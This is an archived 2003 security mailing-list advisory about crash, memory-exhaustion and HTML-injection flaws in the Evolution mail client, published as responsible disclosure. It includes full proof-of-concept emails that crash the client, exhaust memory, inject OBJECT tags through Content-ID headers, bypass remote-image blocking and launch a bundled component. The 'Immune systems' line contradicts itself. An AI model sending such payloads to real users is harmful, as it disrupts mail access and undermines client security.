[UNIX] Multiple vulnerabilities in Ximian's Evolution Mail User Agent

• Previous message: support@securiteam.com: "[NEWS] IBM Tivoli Firewall Security Toolbox (TFST) Remote Buffer Overflow Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 23 Mar 2003 17:52:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Multiple vulnerabilities in Ximian's Evolution Mail User Agent
------------------------------------------------------------------------

SUMMARY

 <http://www.ximian.com> Ximian Evolution is a personal and workgroup
information management solution for Linux and UNIX-based systems. The
software integrates email, calendaring, meeting scheduling, contact
management, and task lists, in one application.

Three vulnerabilities were found that could lead to various forms of
exploitation ranging from denying to users the ability to read email,
provoke system instability, bypassing security context checks for email
content and possibly execution of arbitrary commands on vulnerable
systems.

DETAILS

Vulnerable systems:
 * Evolution 1.2.2 and prior releases are vulnerable

Immune systems:
 * Evolution 1.2.3 and prior releases are vulnerable

Malformed UUEncoded crashes Evolution:
The Evolution mailer accepts UUEncoded content and will transparently
decode it. By including a specially crafted UUE header as part of an
otherwise perfectly normal email an attacker has the ability to crash
Evolution as soon as the mail is parsed. This makes it particularly
difficult to delete this email from Evolution's GUI and prevents a user
from reading email until the malicious mail is removed from the mailbox.

All versions of Evolution that include the function try_uudecoding in the
module mail/mail-format.c are vulnerable.

UUencoded resources starvation:
Having the Evolution mailer process mail content UUencoded multiple times
will cause resource starvation. The MUA will try to allocate memory until
it dies, possibly leading to system instability. Our example in the
technical details section uses email content encoded 3 times.

MIME Content-ID arbitrary content:
By including a specially crafted MIME Content-ID header as part of an
image/* MIME part, it is possible to include arbitrary data, including
HTML tags, into the stream that is passed to GTKHtml for rendering.

These vulnerabilities provide multiple exploitation possibilities in the
Evolution mailer. Namely, it is possible:

A) To crash the application. The crash appears to be the result of heap
corruption, further research on this bug is required to demonstrate
successful exploitation to run arbitrary commands on vulnerable systems.

B) To bypass the "Don't connect to remote hosts to fetch images" option.

C) To execute some bonobo components and pass them arbitrary content
included as part of the mail.

Solution/Vendor Information/Workaround:
Ximian is providing Evolution 1.2.3 on [March 18/March 19]. This release
resolves all vulnerabilities in this advisory as well as other unrelated
bug. The patched code for Evolution that resolves these vulnerabilities is
also already available in GNOME CVS.

A workaround for un-patched versions of Evolution to prevent Evolution
from crashing when viewing messages that exploit these vulnerabilities is
to go into "View"->"Message Display" and change the value to "Show E-mail
Source."

Distribution vendors who provide their own version of Evolution have been
advised of these issues as well as having been provided the patches to fix
them. They may provide updated packages for their distributions.

Technical Description - Exploit/Concept Code:
Malformed UUEncoded crashes Evolution:
The following email will reproduce this vulnerability, note that an empty
line is required before and after the UUE header line.

>From xxx@corest.com Wed Mar 5 14:06:02 2003
 Subject: xxx
 From: X X. X <xxx@corest.com>
 To: xxx@corest.com
 Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
 Message-Id: <1046884154.1731.5.camel@vaiolin>
 Mime-Version: 1.0
 Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
 Content-Disposition: inline; filename=name
 Content-Type: application/octet-stream; name=name
 Content-Transfer-Encoding: 7bit

begin 600
 
end

--=-mTDu5zdJIsixETTwCF5Y--
UUencoded resources starvation:
The following email will reproduce this vulnerability.

>From xxx@corest.com Wed Mar 5 14:06:02 2003
 Subject: xxx
 From: X X. X <xxx@corest.com>
 To: xxx@corest.com
 Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
 Message-Id: <1046884154.1731.5.camel@vaiolin>
 Mime-Version: 1.0
 Date: 05 Mar 2003 14:09:14 -0300

--=3D-mTDu5zdJIsixETTwCF5Y
 Content-Disposition: inline; filename=3Dname
 Content-Type: application/octet-stream; name=3Dname
 Content-Transfer-Encoding: 7bit

begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\
M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
 
end

--=3D-mTDu5zdJIsixETTwCF5Y--

MIME Content-ID arbitrary content:
The handle_image() function, located in the module mail/mail-format.c,
lacks proper input checking. This function does not escape HTML characters
in the string returned by get_cid, which is in turn constructed from the
Content-ID MIME header included in the MIME part.

It can be exploited several ways, for instance:

a) The Evolution mailer will crash when a MIME part's Content-ID is
referenced from two different object tags via the cid "protocol". The
following email will reproduce this vulnerability in Evolution version
1.2.1:

>From xxx@corest.com Wed Mar 5 14:06:02 2003
 Subject: xxx
 From: X X. X <xxx@corest.com>
 To: xxx@corest.com
 Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
 Message-Id: <1046884154.1731.5.camel@vaiolin>
 Mime-Version: 1.0
 Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
 Content-Type: text/plain
 Content-Transfer-Encoding: 7bit
 Content-Id: hello

Hello World!

--=-mTDu5zdJIsixETTwCF5Y
 Content-Disposition: attachment; filename=name1.gif
 Content-Type: image/gif; name=name1.gif
 Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr
"
 Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
 Content-Disposition: attachment; filename=name2.gif
 Content-Type: image/gif; name=name2.gif
 Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr
"
 Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

b) The following email bypasses the "Don't connect to remote hosts to
fetch images" option.

>From xxx@corest.com Wed Mar 5 14:06:02 2003
 Subject: xxx
 From: X X. X <xxx@corest.com>
 To: xxx@corest.com
 Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
 Message-Id: <1046884154.1731.5.camel@vaiolin>
 Mime-Version: 1.0
 Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 Content-Id: apart

<img src="http://external.host.com:anyport">

--=-mTDu5zdJIsixETTwCF5Y
 Content-Disposition: attachment; filename=name2.gif
 Content-Type: image/gif; name=name2.gif
 Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
 Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

c) It is possible to execute bonobo components to handle content types
that Evolution mailer does not handle internally (for example audio/ulaw).
The following mail uses the Content-ID bug to execute the
bonobo-audio-ulaw component (bundled by default with bonobo) and pass it
arbitrary content.

>From xxx@corest.com Wed Mar 5 14:06:02 2003
 Subject: xxx
 From: X X. X <xxx@corest.com>
 To: xxx@corest.com
 Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
 Message-Id: <1046884154.1731.5.camel@vaiolin>
 Mime-Version: 1.0
 Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
 Content-Type: audio/ulaw
 Content-Transfer-Encoding: 7bit
 Content-Id: mysong

There she was, just walking down the street...

--=-mTDu5zdJIsixETTwCF5Y
 Content-Disposition: attachment; filename=name2.gif
 Content-Type: image/gif; name=name2.gif
 Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr
"
 Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

Vendor status:
CORE notification: 2003-03-11
Notification acknowledged by Ximian: 2003-03-11
Fixes added by Ximian to CVS tree: 2003-03-12
BID, CVE numbers assigned: 2003-03-18
Roll out of fixes: 2003-03-19
Advisory published: 2003-03-19

ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@coresecurity.com>
Core Security Technologies Adivsory.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: support@securiteam.com: "[NEWS] IBM Tivoli Firewall Security Toolbox (TFST) Remote Buffer Overflow Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]